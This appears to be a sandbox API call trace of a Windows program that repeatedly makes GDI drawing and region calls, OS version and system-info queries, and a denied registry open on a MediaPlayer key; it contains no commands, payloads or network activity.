BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.477] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.477] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.478] BeginPath (hdc=0x0) returned 0 [0090.478] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.478] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.478] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.478] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.478] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.478] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.478] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.478] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.478] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x440401d9 [0090.478] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x420401dc [0090.478] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045878 [0090.478] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045879 [0090.478] CombineRgn (hrgnDst=0x1045878, hrgnSrc1=0x440401d9, hrgnSrc2=0x420401dc, iMode=1) returned 1 [0090.478] CombineRgn (hrgnDst=0x1045879, hrgnSrc1=0x440401d9, hrgnSrc2=0x420401dc, iMode=4) returned 2 [0090.478] CreateSolidBrush (color=0xff) returned 0x2105877 [0090.478] CreateSolidBrush (color=0xff0000) returned 0x110587a [0090.478] DeleteObject (ho=0x110587a) returned 1 [0090.478] DeleteObject (ho=0x420401dc) returned 1 [0090.478] DeleteObject (ho=0x440401d9) returned 1 [0090.478] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.478] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.478] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.478] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.478] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.478] BeginPath (hdc=0x0) returned 0 [0090.478] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.478] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.478] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.478] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.478] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.478] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.479] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.479] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.479] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x430401dc [0090.479] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x450401d9 [0090.479] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104587b [0090.479] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104587c [0090.479] CombineRgn (hrgnDst=0x104587b, hrgnSrc1=0x430401dc, hrgnSrc2=0x450401d9, iMode=1) returned 1 [0090.479] CombineRgn (hrgnDst=0x104587c, hrgnSrc1=0x430401dc, hrgnSrc2=0x450401d9, iMode=4) returned 2 [0090.479] CreateSolidBrush (color=0xff) returned 0x210587a [0090.479] CreateSolidBrush (color=0xff0000) returned 0x110587d [0090.479] DeleteObject (ho=0x110587d) returned 1 [0090.479] DeleteObject (ho=0x450401d9) returned 1 [0090.479] DeleteObject (ho=0x430401dc) returned 1 [0090.479] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.479] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.479] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.479] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.479] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.479] BeginPath (hdc=0x0) returned 0 [0090.479] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.479] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.479] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.479] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.479] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.479] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.479] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.479] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.480] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x460401d9 [0090.480] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x440401dc [0090.480] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104587e [0090.480] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104587f [0090.480] CombineRgn (hrgnDst=0x104587e, hrgnSrc1=0x460401d9, hrgnSrc2=0x440401dc, iMode=1) returned 1 [0090.480] CombineRgn (hrgnDst=0x104587f, hrgnSrc1=0x460401d9, hrgnSrc2=0x440401dc, iMode=4) returned 2 [0090.480] CreateSolidBrush (color=0xff) returned 0x210587d [0090.480] CreateSolidBrush (color=0xff0000) returned 0x1105880 [0090.480] DeleteObject (ho=0x1105880) returned 1 [0090.480] DeleteObject (ho=0x440401dc) returned 1 [0090.480] DeleteObject (ho=0x460401d9) returned 1 [0090.480] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.480] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.480] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.480] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.480] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.480] BeginPath (hdc=0x0) returned 0 [0090.480] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.480] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.480] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.480] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.480] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.480] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.480] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.480] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.480] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x450401dc [0090.480] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x470401d9 [0090.480] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045881 [0090.481] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045882 [0090.481] CombineRgn (hrgnDst=0x1045881, hrgnSrc1=0x450401dc, hrgnSrc2=0x470401d9, iMode=1) returned 1 [0090.481] CombineRgn (hrgnDst=0x1045882, hrgnSrc1=0x450401dc, hrgnSrc2=0x470401d9, iMode=4) returned 2 [0090.481] CreateSolidBrush (color=0xff) returned 0x2105880 [0090.481] CreateSolidBrush (color=0xff0000) returned 0x1105883 [0090.481] DeleteObject (ho=0x1105883) returned 1 [0090.481] DeleteObject (ho=0x470401d9) returned 1 [0090.481] DeleteObject (ho=0x450401dc) returned 1 [0090.481] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.481] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.481] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.481] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.481] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.481] BeginPath (hdc=0x0) returned 0 [0090.481] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.481] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.481] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.481] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.481] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.481] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.481] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.481] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.481] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x480401d9 [0090.481] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x460401dc [0090.481] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045884 [0090.481] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045885 [0090.481] CombineRgn (hrgnDst=0x1045884, hrgnSrc1=0x480401d9, hrgnSrc2=0x460401dc, iMode=1) returned 1 [0090.481] CombineRgn (hrgnDst=0x1045885, hrgnSrc1=0x480401d9, hrgnSrc2=0x460401dc, iMode=4) returned 2 [0090.481] CreateSolidBrush (color=0xff) returned 0x2105883 [0090.481] CreateSolidBrush (color=0xff0000) returned 0x1105886 [0090.481] DeleteObject (ho=0x1105886) returned 1 [0090.481] DeleteObject (ho=0x460401dc) returned 1 [0090.482] DeleteObject (ho=0x480401d9) returned 1 [0090.482] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.482] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.482] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.482] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.482] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.482] BeginPath (hdc=0x0) returned 0 [0090.482] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.482] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.482] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.482] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.482] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.482] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.482] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.482] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.482] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x470401dc [0090.482] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x490401d9 [0090.482] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045887 [0090.482] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045888 [0090.482] CombineRgn (hrgnDst=0x1045887, hrgnSrc1=0x470401dc, hrgnSrc2=0x490401d9, iMode=1) returned 1 [0090.482] CombineRgn (hrgnDst=0x1045888, hrgnSrc1=0x470401dc, hrgnSrc2=0x490401d9, iMode=4) returned 2 [0090.482] CreateSolidBrush (color=0xff) returned 0x2105886 [0090.482] CreateSolidBrush (color=0xff0000) returned 0x1105889 [0090.482] DeleteObject (ho=0x1105889) returned 1 [0090.482] DeleteObject (ho=0x490401d9) returned 1 [0090.482] DeleteObject (ho=0x470401dc) returned 1 [0090.482] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.482] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.482] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.483] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.483] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.483] BeginPath (hdc=0x0) returned 0 [0090.483] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.483] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.483] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.483] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.483] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.483] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.483] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.483] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.483] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4a0401d9 [0090.483] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x480401dc [0090.483] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104588a [0090.483] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104588b [0090.483] CombineRgn (hrgnDst=0x104588a, hrgnSrc1=0x4a0401d9, hrgnSrc2=0x480401dc, iMode=1) returned 1 [0090.483] CombineRgn (hrgnDst=0x104588b, hrgnSrc1=0x4a0401d9, hrgnSrc2=0x480401dc, iMode=4) returned 2 [0090.483] CreateSolidBrush (color=0xff) returned 0x2105889 [0090.483] CreateSolidBrush (color=0xff0000) returned 0x110588c [0090.483] DeleteObject (ho=0x110588c) returned 1 [0090.483] DeleteObject (ho=0x480401dc) returned 1 [0090.483] DeleteObject (ho=0x4a0401d9) returned 1 [0090.483] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.483] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.483] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.483] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.483] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.483] BeginPath (hdc=0x0) returned 0 [0090.483] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.483] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.483] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.484] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.484] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.484] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.484] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.484] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.484] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x490401dc [0090.484] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4b0401d9 [0090.484] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104588d [0090.484] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104588e [0090.484] CombineRgn (hrgnDst=0x104588d, hrgnSrc1=0x490401dc, hrgnSrc2=0x4b0401d9, iMode=1) returned 1 [0090.484] CombineRgn (hrgnDst=0x104588e, hrgnSrc1=0x490401dc, hrgnSrc2=0x4b0401d9, iMode=4) returned 2 [0090.484] CreateSolidBrush (color=0xff) returned 0x210588c [0090.484] CreateSolidBrush (color=0xff0000) returned 0x110588f [0090.484] DeleteObject (ho=0x110588f) returned 1 [0090.484] DeleteObject (ho=0x4b0401d9) returned 1 [0090.484] DeleteObject (ho=0x490401dc) returned 1 [0090.484] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.484] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.484] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.484] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.484] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.484] BeginPath (hdc=0x0) returned 0 [0090.484] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.484] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.484] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.484] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.484] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.484] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.484] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.485] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.485] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4c0401d9 [0090.485] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4a0401dc [0090.485] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045890 [0090.485] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045891 [0090.485] CombineRgn (hrgnDst=0x1045890, hrgnSrc1=0x4c0401d9, hrgnSrc2=0x4a0401dc, iMode=1) returned 1 [0090.485] CombineRgn (hrgnDst=0x1045891, hrgnSrc1=0x4c0401d9, hrgnSrc2=0x4a0401dc, iMode=4) returned 2 [0090.485] CreateSolidBrush (color=0xff) returned 0x210588f [0090.485] CreateSolidBrush (color=0xff0000) returned 0x1105892 [0090.485] DeleteObject (ho=0x1105892) returned 1 [0090.485] DeleteObject (ho=0x4a0401dc) returned 1 [0090.485] DeleteObject (ho=0x4c0401d9) returned 1 [0090.485] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.485] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.485] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.485] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.485] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.485] BeginPath (hdc=0x0) returned 0 [0090.485] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.485] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.485] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.485] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.485] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.485] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.485] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.485] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.486] 